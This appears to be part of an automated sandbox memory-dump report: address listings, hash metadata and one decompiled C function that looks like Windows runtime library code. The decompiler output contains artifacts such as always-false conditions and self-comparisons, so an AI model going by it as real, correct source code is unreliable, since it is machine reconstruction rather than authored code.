                                                                                      0x017d43a1
                                                                                      0x017d43ad
                                                                                      0x017d43bb
                                                                                      0x017d43bb
                                                                                      0x017d43ad
                                                                                      0x017d436e
                                                                                      0x017d43bf
                                                                                      0x017d43c5
                                                                                      0x017d4463
                                                                                      0x017d4463
                                                                                      0x017d43ce
                                                                                      0x017d43d5
                                                                                      0x017d43d9
                                                                                      0x017d43df
                                                                                      0x017d4475
                                                                                      0x017d4479
                                                                                      0x017d4491
                                                                                      0x017d4491
                                                                                      0x017d4479
                                                                                      0x017d43e5
                                                                                      0x017d43eb
                                                                                      0x017d43f4
                                                                                      0x017d43f6
                                                                                      0x017d43f9
                                                                                      0x017d43fc
                                                                                      0x017d43ff
                                                                                      0x017d44e8
                                                                                      0x017d44ed
                                                                                      0x017d44f3
                                                                                      0x0181e247
                                                                                      0x00000000
                                                                                      0x017d44f9
                                                                                      0x017d4504
                                                                                      0x017d4508
                                                                                      0x017d450f
                                                                                      0x0181e269
                                                                                      0x00000000
                                                                                      0x017d4515
                                                                                      0x017d4519
                                                                                      0x017d4531
                                                                                      0x017d4534
                                                                                      0x017d4537
                                                                                      0x017d453e
                                                                                      0x017d4541
                                                                                      0x017d454a
                                                                                      0x0181e255
                                                                                      0x0181e255
                                                                                      0x0181e25b
                                                                                      0x0181e25e
                                                                                      0x0181e261
                                                                                      0x0181e261
                                                                                      0x017d4555
                                                                                      0x017d4559
                                                                                      0x017d455d
                                                                                      0x0181e26d
                                                                                      0x0181e270
                                                                                      0x0181e274
                                                                                      0x0181e27a
                                                                                      0x0181e27d
                                                                                      0x0181e28e
                                                                                      0x0181e28e
                                                                                      0x017d4563
                                                                                      0x017d4563
                                                                                      0x017d4569
                                                                                      0x017d4569
                                                                                      0x00000000
                                                                                      0x017d455d
                                                                                      0x017d450f
                                                                                      0x00000000
                                                                                      0x017d44f3
                                                                                      0x017d43ff
                                                                                      0x017d4405
                                                                                      0x017d4405
                                                                                      0x017d4405
                                                                                      0x017d42ac
                                                                                      0x017d428c
                                                                                      0x017d4282
                                                                                      0x017d4407
                                                                                      0x017d440d
                                                                                      0x0181e2af
                                                                                      0x0181e2af
                                                                                      0x017d4413
                                                                                      0x017d4413
                                                                                      0x00000000
                                                                                      0x017d41d4
                                                                                      0x00000000
                                                                                      0x017d41c3
                                                                                      0x017d41bd
                                                                                      0x017d4415
                                                                                      0x017d4415
                                                                                      0x017d4416
                                                                                      0x017d4417
                                                                                      0x017d4429
                                                                                      0x017d416e
                                                                                      0x017d416e
                                                                                      0x017d4175
                                                                                      0x017d4498
                                                                                      0x017d449f
                                                                                      0x0181e12d
                                                                                      0x00000000
                                                                                      0x0181e133
                                                                                      0x00000000
                                                                                      0x0181e133
                                                                                      0x017d44a5
                                                                                      0x017d44a5
                                                                                      0x017d44aa
                                                                                      0x00000000
                                                                                      0x017d44bb
                                                                                      0x017d44ca
                                                                                      0x017d44d6
                                                                                      0x017d44d7
                                                                                      0x017d44d8
                                                                                      0x017d44e3
                                                                                      0x017d44e3
                                                                                      0x017d44aa
                                                                                      0x017d417b
                                                                                      0x017d417b
                                                                                      0x017d417b
                                                                                      0x00000000
                                                                                      0x017d417b
                                                                                      0x017d4175
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1755e78adea51aa51b76a7e7d40d3e976bf648f29677c092b324726373058179
                                                                                      • Instruction ID: 3f1c18852c0cdddb34ec0b2a0c569c8b65080f7fd344e734320f81ee0cb394a8
                                                                                      • Opcode Fuzzy Hash: 1755e78adea51aa51b76a7e7d40d3e976bf648f29677c092b324726373058179
                                                                                      • Instruction Fuzzy Hash: 10F179716082158BC725CF18C484A7AFBF1BF88714F54896EF98ACBA94E734D981CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 92%
                                                                                      			E017E20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed char _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				signed int _v32;
                                                                                      				void* _v36;
                                                                                      				char _v48;
                                                                                      				signed int _v52;
                                                                                      				signed int _v56;
                                                                                      				unsigned int _v60;
                                                                                      				char _v64;
                                                                                      				unsigned int _v68;
                                                                                      				signed int _v72;
                                                                                      				char _v73;
                                                                                      				signed int _v74;
                                                                                      				char _v75;
                                                                                      				signed int _v76;
                                                                                      				void* _v81;
                                                                                      				void* _v82;
                                                                                      				void* _v89;
                                                                                      				void* _v92;
                                                                                      				void* _v97;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed char _t128;
                                                                                      				void* _t129;
                                                                                      				signed int _t130;
                                                                                      				void* _t132;
                                                                                      				signed char _t133;
                                                                                      				intOrPtr _t135;
                                                                                      				signed int _t137;
                                                                                      				signed int _t140;
                                                                                      				signed int* _t144;
                                                                                      				signed int* _t145;
                                                                                      				intOrPtr _t146;
                                                                                      				signed int _t147;
                                                                                      				signed char* _t148;
                                                                                      				signed int _t149;
                                                                                      				signed int _t153;
                                                                                      				signed int _t169;
                                                                                      				signed int _t174;
                                                                                      				signed int _t180;
                                                                                      				void* _t197;
                                                                                      				void* _t198;
                                                                                      				signed int _t201;
                                                                                      				intOrPtr* _t202;
                                                                                      				intOrPtr* _t205;
                                                                                      				signed int _t210;
                                                                                      				signed int _t215;
                                                                                      				signed int _t218;
                                                                                      				signed char _t221;
                                                                                      				signed int _t226;
                                                                                      				char _t227;
                                                                                      				signed int _t228;
                                                                                      				void* _t229;
                                                                                      				unsigned int _t231;
                                                                                      				void* _t235;
                                                                                      				signed int _t240;
                                                                                      				signed int _t241;
                                                                                      				void* _t242;
                                                                                      				signed int _t246;
                                                                                      				signed int _t248;
                                                                                      				signed int _t252;
                                                                                      				signed int _t253;
                                                                                      				void* _t254;
                                                                                      				intOrPtr* _t256;
                                                                                      				intOrPtr _t257;
                                                                                      				unsigned int _t262;
                                                                                      				signed int _t265;
                                                                                      				void* _t267;
                                                                                      				signed int _t275;
                                                                                      
                                                                                      				_t198 = __ebx;
                                                                                      				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                                                      				_v68 = __ecx;
                                                                                      				_v73 = 0;
                                                                                      				_t201 = __edx & 0x00002000;
                                                                                      				_t128 = __edx & 0xffffdfff;
                                                                                      				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                                                      				_v72 = _t128;
                                                                                      				if((_t128 & 0x00000008) != 0) {
                                                                                      					__eflags = _t128 - 8;
                                                                                      					if(_t128 != 8) {
                                                                                      						L69:
                                                                                      						_t129 = 0xc000000d;
                                                                                      						goto L23;
                                                                                      					} else {
                                                                                      						_t130 = 0;
                                                                                      						_v72 = 0;
                                                                                      						_v75 = 1;
                                                                                      						L2:
                                                                                      						_v74 = 1;
                                                                                      						_t226 =  *0x18a8714; // 0x0
                                                                                      						if(_t226 != 0) {
                                                                                      							__eflags = _t201;
                                                                                      							if(_t201 != 0) {
                                                                                      								L62:
                                                                                      								_v74 = 1;
                                                                                      								L63:
                                                                                      								_t130 = _t226 & 0xffffdfff;
                                                                                      								_v72 = _t130;
                                                                                      								goto L3;
                                                                                      							}
                                                                                      							_v74 = _t201;
                                                                                      							__eflags = _t226 & 0x00002000;
                                                                                      							if((_t226 & 0x00002000) == 0) {
                                                                                      								goto L63;
                                                                                      							}
                                                                                      							goto L62;
                                                                                      						}
                                                                                      						L3:
                                                                                      						_t227 = _v75;
                                                                                      						L4:
                                                                                      						_t240 = 0;
                                                                                      						_v56 = 0;
                                                                                      						_t252 = _t130 & 0x00000100;
                                                                                      						if(_t252 != 0 || _t227 != 0) {
                                                                                      							_t240 = _v68;
                                                                                      							_t132 = E017E2EB0(_t240);
                                                                                      							__eflags = _t132 - 2;
                                                                                      							if(_t132 != 2) {
                                                                                      								__eflags = _t132 - 1;
                                                                                      								if(_t132 == 1) {
                                                                                      									goto L25;
                                                                                      								}
                                                                                      								__eflags = _t132 - 6;
                                                                                      								if(_t132 == 6) {
                                                                                      									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                                                      									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                                                      										goto L40;
                                                                                      									}
                                                                                      									_t197 = E017E2EB0(_t240 + 8);
                                                                                      									__eflags = _t197 - 2;
                                                                                      									if(_t197 == 2) {
                                                                                      										goto L25;
                                                                                      									}
                                                                                      								}
                                                                                      								L40:
                                                                                      								_t133 = 1;
                                                                                      								L26:
                                                                                      								_t228 = _v75;
                                                                                      								_v56 = _t240;
                                                                                      								__eflags = _t133;
                                                                                      								if(_t133 != 0) {
                                                                                      									__eflags = _t228;
                                                                                      									if(_t228 == 0) {
                                                                                      										L43:
                                                                                      										__eflags = _v72;
                                                                                      										if(_v72 == 0) {
                                                                                      											goto L8;
                                                                                      										}
                                                                                      										goto L69;
                                                                                      									}
                                                                                      									_t133 = E017B58EC(_t240);
                                                                                      									_t221 =  *0x18a5cac; // 0x16
                                                                                      									__eflags = _t221 & 0x00000040;
                                                                                      									if((_t221 & 0x00000040) != 0) {
                                                                                      										_t228 = 0;
                                                                                      										__eflags = _t252;
                                                                                      										if(_t252 != 0) {
                                                                                      											goto L43;
                                                                                      										}
                                                                                      										_t133 = _v72;
                                                                                      										goto L7;
                                                                                      									}
                                                                                      									goto L43;
                                                                                      								} else {
                                                                                      									_t133 = _v72;
                                                                                      									goto L6;
                                                                                      								}
                                                                                      							}
                                                                                      							L25:
                                                                                      							_t133 = _v73;
                                                                                      							goto L26;
                                                                                      						} else {
                                                                                      							L6:
                                                                                      							_t221 =  *0x18a5cac; // 0x16
                                                                                      							L7:
                                                                                      							if(_t133 != 0) {
                                                                                      								__eflags = _t133 & 0x00001000;
                                                                                      								if((_t133 & 0x00001000) != 0) {
                                                                                      									_t133 = _t133 | 0x00000a00;
                                                                                      									__eflags = _t221 & 0x00000004;
                                                                                      									if((_t221 & 0x00000004) != 0) {
                                                                                      										_t133 = _t133 | 0x00000400;
                                                                                      									}
                                                                                      								}
                                                                                      								__eflags = _t228;
                                                                                      								if(_t228 != 0) {
                                                                                      									_t133 = _t133 | 0x00000100;
                                                                                      								}
                                                                                      								_t229 = E017F4A2C(0x18a6e40, 0x17f4b30, _t133, _t240);
                                                                                      								__eflags = _t229;
                                                                                      								if(_t229 == 0) {
                                                                                      									_t202 = _a20;
                                                                                      									goto L100;
                                                                                      								} else {
                                                                                      									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                                                      									L15:
                                                                                      									_t202 = _a20;
                                                                                      									 *_t202 = _t135;
                                                                                      									if(_t229 == 0) {
                                                                                      										L100:
                                                                                      										 *_a4 = 0;
                                                                                      										_t137 = _a8;
                                                                                      										__eflags = _t137;
                                                                                      										if(_t137 != 0) {
                                                                                      											 *_t137 = 0;
                                                                                      										}
                                                                                      										 *_t202 = 0;
                                                                                      										_t129 = 0xc0000017;
                                                                                      										goto L23;
                                                                                      									} else {
                                                                                      										_t242 = _a16;
                                                                                      										if(_t242 != 0) {
                                                                                      											_t254 = _t229;
                                                                                      											memcpy(_t242, _t254, 0xd << 2);
                                                                                      											_t267 = _t267 + 0xc;
                                                                                      											_t242 = _t254 + 0x1a;
                                                                                      										}
                                                                                      										_t205 = _a4;
                                                                                      										_t25 = _t229 + 0x48; // 0x48
                                                                                      										 *_t205 = _t25;
                                                                                      										_t140 = _a8;
                                                                                      										if(_t140 != 0) {
                                                                                      											__eflags =  *((char*)(_t267 + 0xa));
                                                                                      											if( *((char*)(_t267 + 0xa)) != 0) {
                                                                                      												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                                                      											} else {
                                                                                      												 *_t140 = 0;
                                                                                      											}
                                                                                      										}
                                                                                      										_t256 = _a12;
                                                                                      										if(_t256 != 0) {
                                                                                      											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                                                      										}
                                                                                      										_t257 =  *_t205;
                                                                                      										_v48 = 0;
                                                                                      										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                                                      										_v56 = 0;
                                                                                      										_v52 = 0;
                                                                                      										_t144 =  *( *[fs:0x30] + 0x50);
                                                                                      										if(_t144 != 0) {
                                                                                      											__eflags =  *_t144;
                                                                                      											if( *_t144 == 0) {
                                                                                      												goto L20;
                                                                                      											}
                                                                                      											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                      											goto L21;
                                                                                      										} else {
                                                                                      											L20:
                                                                                      											_t145 = 0x7ffe0384;
                                                                                      											L21:
                                                                                      											if( *_t145 != 0) {
                                                                                      												_t146 =  *[fs:0x30];
                                                                                      												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                                                      												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                                                      													_t147 = E017D7D50();
                                                                                      													__eflags = _t147;
                                                                                      													if(_t147 == 0) {
                                                                                      														_t148 = 0x7ffe0385;
                                                                                      													} else {
                                                                                      														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                      													}
                                                                                      													__eflags =  *_t148 & 0x00000020;
                                                                                      													if(( *_t148 & 0x00000020) != 0) {
                                                                                      														_t149 = _v72;
                                                                                      														__eflags = _t149;
                                                                                      														if(__eflags == 0) {
                                                                                      															_t149 = 0x1795c80;
                                                                                      														}
                                                                                      														_push(_t149);
                                                                                      														_push( &_v48);
                                                                                      														 *((char*)(_t267 + 0xb)) = E017EF6E0(_t198, _t242, _t257, __eflags);
                                                                                      														_push(_t257);
                                                                                      														_push( &_v64);
                                                                                      														_t153 = E017EF6E0(_t198, _t242, _t257, __eflags);
                                                                                      														__eflags =  *((char*)(_t267 + 0xb));
                                                                                      														if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                      															__eflags = _t153;
                                                                                      															if(_t153 != 0) {
                                                                                      																__eflags = 0;
                                                                                      																E01837016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                                                      																L017D2400(_t267 + 0x20);
                                                                                      															}
                                                                                      															L017D2400( &_v64);
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      											_t129 = 0;
                                                                                      											L23:
                                                                                      											return _t129;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      							L8:
                                                                                      							_t275 = _t240;
                                                                                      							if(_t275 != 0) {
                                                                                      								_v73 = 0;
                                                                                      								_t253 = 0;
                                                                                      								__eflags = 0;
                                                                                      								L29:
                                                                                      								_push(0);
                                                                                      								_t241 = E017E2397(_t240);
                                                                                      								__eflags = _t241;
                                                                                      								if(_t241 == 0) {
                                                                                      									_t229 = 0;
                                                                                      									L14:
                                                                                      									_t135 = 0;
                                                                                      									goto L15;
                                                                                      								}
                                                                                      								__eflags =  *((char*)(_t267 + 0xb));
                                                                                      								 *(_t241 + 0x34) = 1;
                                                                                      								if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                      									E017D2280(_t134, 0x18a8608);
                                                                                      									__eflags =  *0x18a6e48 - _t253; // 0x0
                                                                                      									if(__eflags != 0) {
                                                                                      										L48:
                                                                                      										_t253 = 0;
                                                                                      										__eflags = 0;
                                                                                      										L49:
                                                                                      										E017CFFB0(_t198, _t241, 0x18a8608);
                                                                                      										__eflags = _t253;
                                                                                      										if(_t253 != 0) {
                                                                                      											L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                                                      										}
                                                                                      										goto L31;
                                                                                      									}
                                                                                      									 *0x18a6e48 = _t241;
                                                                                      									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                                                      									__eflags = _t253;
                                                                                      									if(_t253 != 0) {
                                                                                      										_t57 = _t253 + 0x34;
                                                                                      										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                                                      										__eflags =  *_t57;
                                                                                      										if( *_t57 == 0) {
                                                                                      											goto L49;
                                                                                      										}
                                                                                      									}
                                                                                      									goto L48;
                                                                                      								}
                                                                                      								L31:
                                                                                      								_t229 = _t241;
                                                                                      								goto L14;
                                                                                      							}
                                                                                      							_v73 = 1;
                                                                                      							_v64 = _t240;
                                                                                      							asm("lock bts dword [esi], 0x0");
                                                                                      							if(_t275 < 0) {
                                                                                      								_t231 =  *0x18a8608; // 0x0
                                                                                      								while(1) {
                                                                                      									_v60 = _t231;
                                                                                      									__eflags = _t231 & 0x00000001;
                                                                                      									if((_t231 & 0x00000001) != 0) {
                                                                                      										goto L76;
                                                                                      									}
                                                                                      									_t73 = _t231 + 1; // 0x1
                                                                                      									_t210 = _t73;
                                                                                      									asm("lock cmpxchg [edi], ecx");
                                                                                      									__eflags = _t231 - _t231;
                                                                                      									if(_t231 != _t231) {
                                                                                      										L92:
                                                                                      										_t133 = E017E6B90(_t210,  &_v64);
                                                                                      										_t262 =  *0x18a8608; // 0x0
                                                                                      										L93:
                                                                                      										_t231 = _t262;
                                                                                      										continue;
                                                                                      									}
                                                                                      									_t240 = _v56;
                                                                                      									goto L10;
                                                                                      									L76:
                                                                                      									_t169 = E017EE180(_t133);
                                                                                      									__eflags = _t169;
                                                                                      									if(_t169 != 0) {
                                                                                      										_push(0xc000004b);
                                                                                      										_push(0xffffffff);
                                                                                      										E017F97C0();
                                                                                      										_t231 = _v68;
                                                                                      									}
                                                                                      									_v72 = 0;
                                                                                      									_v24 =  *( *[fs:0x18] + 0x24);
                                                                                      									_v16 = 3;
                                                                                      									_v28 = 0;
                                                                                      									__eflags = _t231 & 0x00000002;
                                                                                      									if((_t231 & 0x00000002) == 0) {
                                                                                      										_v32 =  &_v36;
                                                                                      										_t174 = _t231 >> 4;
                                                                                      										__eflags = 1 - _t174;
                                                                                      										_v20 = _t174;
                                                                                      										asm("sbb ecx, ecx");
                                                                                      										_t210 = 3 |  &_v36;
                                                                                      										__eflags = _t174;
                                                                                      										if(_t174 == 0) {
                                                                                      											_v20 = 0xfffffffe;
                                                                                      										}
                                                                                      									} else {
                                                                                      										_v32 = 0;
                                                                                      										_v20 = 0xffffffff;
                                                                                      										_v36 = _t231 & 0xfffffff0;
                                                                                      										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                                                      										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                                                      									}
                                                                                      									asm("lock cmpxchg [edi], esi");
                                                                                      									_t262 = _t231;
                                                                                      									__eflags = _t262 - _t231;
                                                                                      									if(_t262 != _t231) {
                                                                                      										goto L92;
                                                                                      									} else {
                                                                                      										__eflags = _v72;
                                                                                      										if(_v72 != 0) {
                                                                                      											E017F006A(0x18a8608, _t210);
                                                                                      										}
                                                                                      										__eflags =  *0x7ffe036a - 1;
                                                                                      										if(__eflags <= 0) {
                                                                                      											L89:
                                                                                      											_t133 =  &_v16;
                                                                                      											asm("lock btr dword [eax], 0x1");
                                                                                      											if(__eflags >= 0) {
                                                                                      												goto L93;
                                                                                      											} else {
                                                                                      												goto L90;
                                                                                      											}
                                                                                      											do {
                                                                                      												L90:
                                                                                      												_push(0);
                                                                                      												_push(0x18a8608);
                                                                                      												E017FB180();
                                                                                      												_t133 = _v24;
                                                                                      												__eflags = _t133 & 0x00000004;
                                                                                      											} while ((_t133 & 0x00000004) == 0);
                                                                                      											goto L93;
                                                                                      										} else {
                                                                                      											_t218 =  *0x18a6904; // 0x400
                                                                                      											__eflags = _t218;
                                                                                      											if(__eflags == 0) {
                                                                                      												goto L89;
                                                                                      											} else {
                                                                                      												goto L87;
                                                                                      											}
                                                                                      											while(1) {
                                                                                      												L87:
                                                                                      												__eflags = _v16 & 0x00000002;
                                                                                      												if(__eflags == 0) {
                                                                                      													goto L89;
                                                                                      												}
                                                                                      												asm("pause");
                                                                                      												_t218 = _t218 - 1;
                                                                                      												__eflags = _t218;
                                                                                      												if(__eflags != 0) {
                                                                                      													continue;
                                                                                      												}
                                                                                      												goto L89;
                                                                                      											}
                                                                                      											goto L89;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      							L10:
                                                                                      							_t229 =  *0x18a6e48; // 0x0
                                                                                      							_v72 = _t229;
                                                                                      							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                                      								E017CFFB0(_t198, _t240, 0x18a8608);
                                                                                      								_t253 = _v76;
                                                                                      								goto L29;
                                                                                      							} else {
                                                                                      								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                                                      								asm("lock cmpxchg [esi], ecx");
                                                                                      								_t215 = 1;
                                                                                      								if(1 != 1) {
                                                                                      									while(1) {
                                                                                      										_t246 = _t215 & 0x00000006;
                                                                                      										_t180 = _t215;
                                                                                      										__eflags = _t246 - 2;
                                                                                      										_v56 = _t246;
                                                                                      										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                                                      										asm("lock cmpxchg [edi], esi");
                                                                                      										_t248 = _v56;
                                                                                      										__eflags = _t180 - _t215;
                                                                                      										if(_t180 == _t215) {
                                                                                      											break;
                                                                                      										}
                                                                                      										_t215 = _t180;
                                                                                      									}
                                                                                      									__eflags = _t248 - 2;
                                                                                      									if(_t248 == 2) {
                                                                                      										__eflags = 0;
                                                                                      										E017F00C2(0x18a8608, 0, _t235);
                                                                                      									}
                                                                                      									_t229 = _v72;
                                                                                      								}
                                                                                      								goto L14;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				_t227 = 0;
                                                                                      				_v75 = 0;
                                                                                      				if(_t128 != 0) {
                                                                                      					goto L4;
                                                                                      				}
                                                                                      				goto L2;
                                                                                      			}

                                                                                      0x01825a87
                                                                                      0x01825a8c
                                                                                      0x01825a91
                                                                                      0x01825a97
                                                                                      0x01825a9f
                                                                                      0x01825aa0
                                                                                      0x01825aa1
                                                                                      0x01825aa6
                                                                                      0x01825aab
                                                                                      0x01825ab1
                                                                                      0x01825ab3
                                                                                      0x01825ab9
                                                                                      0x01825aca
                                                                                      0x01825ad4
                                                                                      0x01825ad4
                                                                                      0x01825ade
                                                                                      0x01825ade
                                                                                      0x01825aab
                                                                                      0x01825a79
                                                                                      0x01825a52
                                                                                      0x017e21f7
                                                                                      0x017e21f9
                                                                                      0x017e21fe
                                                                                      0x017e21fe
                                                                                      0x017e21e3
                                                                                      0x017e2195
                                                                                      0x017e236c
                                                                                      0x017e2122
                                                                                      0x017e2122
                                                                                      0x017e2124
                                                                                      0x017e2231
                                                                                      0x017e2236
                                                                                      0x017e2236
                                                                                      0x017e2238
                                                                                      0x017e2238
                                                                                      0x017e2240
                                                                                      0x017e2242
                                                                                      0x017e2244
                                                                                      0x018259fc
                                                                                      0x017e218c
                                                                                      0x017e218c
                                                                                      0x00000000
                                                                                      0x017e218c
                                                                                      0x017e224a
                                                                                      0x017e224f
                                                                                      0x017e2256
                                                                                      0x017e2304
                                                                                      0x017e2309
                                                                                      0x017e230f
                                                                                      0x017e231e
                                                                                      0x017e231e
                                                                                      0x017e231e
                                                                                      0x017e2320
                                                                                      0x017e2325
                                                                                      0x017e232a
                                                                                      0x017e232c
                                                                                      0x017e233e
                                                                                      0x017e233e
                                                                                      0x00000000
                                                                                      0x017e232c
                                                                                      0x017e2311
                                                                                      0x017e2317
                                                                                      0x017e231a
                                                                                      0x017e231c
                                                                                      0x017e2380
                                                                                      0x017e2380
                                                                                      0x017e2380
                                                                                      0x017e2384
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e2386
                                                                                      0x00000000
                                                                                      0x017e231c
                                                                                      0x017e225c
                                                                                      0x017e225c
                                                                                      0x00000000
                                                                                      0x017e225c
                                                                                      0x017e212a
                                                                                      0x017e2134
                                                                                      0x017e2138
                                                                                      0x017e213d
                                                                                      0x01825858
                                                                                      0x01825863
                                                                                      0x01825863
                                                                                      0x01825867
                                                                                      0x0182586a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0182586c
                                                                                      0x0182586c
                                                                                      0x01825871
                                                                                      0x01825875
                                                                                      0x01825877
                                                                                      0x01825997
                                                                                      0x0182599c
                                                                                      0x018259a1
                                                                                      0x018259a7
                                                                                      0x018259a7
                                                                                      0x00000000
                                                                                      0x018259a7
                                                                                      0x0182587d
                                                                                      0x00000000
                                                                                      0x0182588b
                                                                                      0x0182588b
                                                                                      0x01825890
                                                                                      0x01825892
                                                                                      0x01825894
                                                                                      0x01825899
                                                                                      0x0182589b
                                                                                      0x018258a0
                                                                                      0x018258a0
                                                                                      0x018258aa
                                                                                      0x018258b2
                                                                                      0x018258b6
                                                                                      0x018258be
                                                                                      0x018258c6
                                                                                      0x018258c9
                                                                                      0x0182590d
                                                                                      0x01825917
                                                                                      0x0182591a
                                                                                      0x0182591c
                                                                                      0x01825920
                                                                                      0x01825928
                                                                                      0x0182592a
                                                                                      0x0182592c
                                                                                      0x0182592e
                                                                                      0x0182592e
                                                                                      0x018258cb
                                                                                      0x018258cd
                                                                                      0x018258d8
                                                                                      0x018258e0
                                                                                      0x018258f4
                                                                                      0x018258fe
                                                                                      0x018258fe
                                                                                      0x0182593a
                                                                                      0x0182593e
                                                                                      0x01825940
                                                                                      0x01825942
                                                                                      0x00000000
                                                                                      0x01825944
                                                                                      0x01825944
                                                                                      0x01825949
                                                                                      0x0182594e
                                                                                      0x0182594e
                                                                                      0x01825953
                                                                                      0x0182595b
                                                                                      0x01825976
                                                                                      0x01825976
                                                                                      0x0182597a
                                                                                      0x0182597f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01825981
                                                                                      0x01825981
                                                                                      0x01825981
                                                                                      0x01825983
                                                                                      0x01825988
                                                                                      0x0182598d
                                                                                      0x01825991
                                                                                      0x01825991
                                                                                      0x00000000
                                                                                      0x0182595d
                                                                                      0x0182595d
                                                                                      0x01825963
                                                                                      0x01825965
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01825967
                                                                                      0x01825967
                                                                                      0x0182596b
                                                                                      0x0182596d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0182596f
                                                                                      0x01825971
                                                                                      0x01825971
                                                                                      0x01825974
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01825974
                                                                                      0x00000000
                                                                                      0x01825967
                                                                                      0x0182595b
                                                                                      0x01825942
                                                                                      0x01825863
                                                                                      0x017e2143
                                                                                      0x017e2143
                                                                                      0x017e2149
                                                                                      0x017e214f
                                                                                      0x017e22f1
                                                                                      0x017e22f6
                                                                                      0x00000000
                                                                                      0x017e2173
                                                                                      0x017e2173
                                                                                      0x017e217d
                                                                                      0x017e2181
                                                                                      0x017e2186
                                                                                      0x018259ae
                                                                                      0x018259b2
                                                                                      0x018259b5
                                                                                      0x018259b7
                                                                                      0x018259ba
                                                                                      0x018259cd
                                                                                      0x018259d1
                                                                                      0x018259d5
                                                                                      0x018259d9
                                                                                      0x018259db
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x018259dd
                                                                                      0x018259dd
                                                                                      0x018259e1
                                                                                      0x018259e4
                                                                                      0x018259e7
                                                                                      0x018259ee
                                                                                      0x018259ee
                                                                                      0x018259f3
                                                                                      0x018259f3
                                                                                      0x00000000
                                                                                      0x017e2186
                                                                                      0x017e214f
                                                                                      0x017e2106
                                                                                      0x017e2266
                                                                                      0x017e20d8
                                                                                      0x017e20da
                                                                                      0x017e20e0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b960770cff83e295fa88d16984ea834c7a094d614f1ad0df526444dc2eb08274
                                                                                      • Instruction ID: 9737255671266d8cf78a88dd19d75fac45530e8b02a4d4bdfb1044c68e64d20d
                                                                                      • Opcode Fuzzy Hash: b960770cff83e295fa88d16984ea834c7a094d614f1ad0df526444dc2eb08274
                                                                                      • Instruction Fuzzy Hash: 82F115316083519FE726CF2CC44876BFBE9AF89314F08855DE995CB282D774DA81CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4b45584649ae2eaf2ceb58d6d5d18f9ba9d4902ef6aaaafff85e49b67d11f75b
                                                                                      • Instruction ID: fde7c1013a2aceed0f365d4a16a1c171a3ccccc2e81afde9c0f489c3157e43a7
                                                                                      • Opcode Fuzzy Hash: 4b45584649ae2eaf2ceb58d6d5d18f9ba9d4902ef6aaaafff85e49b67d11f75b
                                                                                      • Instruction Fuzzy Hash: 48E1F131A0025ACFEB34DF68C884BAAF7B6BF45704F0441ADD909A7295D774AA81CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
